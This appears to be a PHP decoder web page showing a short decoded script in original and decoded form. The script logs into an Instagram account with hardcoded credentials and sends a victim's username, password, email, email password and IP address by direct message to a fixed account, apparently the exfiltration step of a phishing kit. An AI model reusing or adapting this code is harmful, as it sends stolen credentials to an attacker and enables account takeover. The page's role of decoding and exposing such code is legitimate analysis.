Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

require 'vendor2/autoload.php'; /////// CONFIG /////// $debug = false; $truncatedDebug ..

Decoded Output download

<?  require 'vendor2/autoload.php'; 
/////// CONFIG /////// 
$debug = false; 
$truncatedDebug = false; 
////////////////////// 
\InstagramAPI\Instagram::$allowDangerousWebUsageAtMyOwnRisk = true; 
////////////////////// 
$ig = new \InstagramAPI\Instagram($debug,$truncatedDebug); 
$ig->login("lexy.can","lexy.canlexy.can");  
 
$msg = "Kullanc Ad : $nick 
ifre: $password 
Mail : $mail 
Mail ifre: $mailpass 
p Adresi : $ip"; 
 
$ig->direct->sendText([ 
    'users' => ['9898765149'] 
], $msg); 
 
 ?>

Did this file decode correctly?

Original Code

require 'vendor2/autoload.php';
/////// CONFIG ///////
$debug = false;
$truncatedDebug = false;
//////////////////////
\InstagramAPI\Instagram::$allowDangerousWebUsageAtMyOwnRisk = true;
//////////////////////
$ig = new \InstagramAPI\Instagram($debug,$truncatedDebug);
$ig->login("lexy.can","lexy.canlexy.can"); 

$msg = "Kullanc Ad : $nick
ifre: $password
Mail : $mail
Mail ifre: $mailpass
p Adresi : $ip";

$ig->direct->sendText([
    'users' => ['9898765149']
], $msg);

Function Calls

None

Variables

None

Stats

MD5 c08c4973ecbcff08fa5e543819ddb5d7
Eval Count 0
Decode Time 92 ms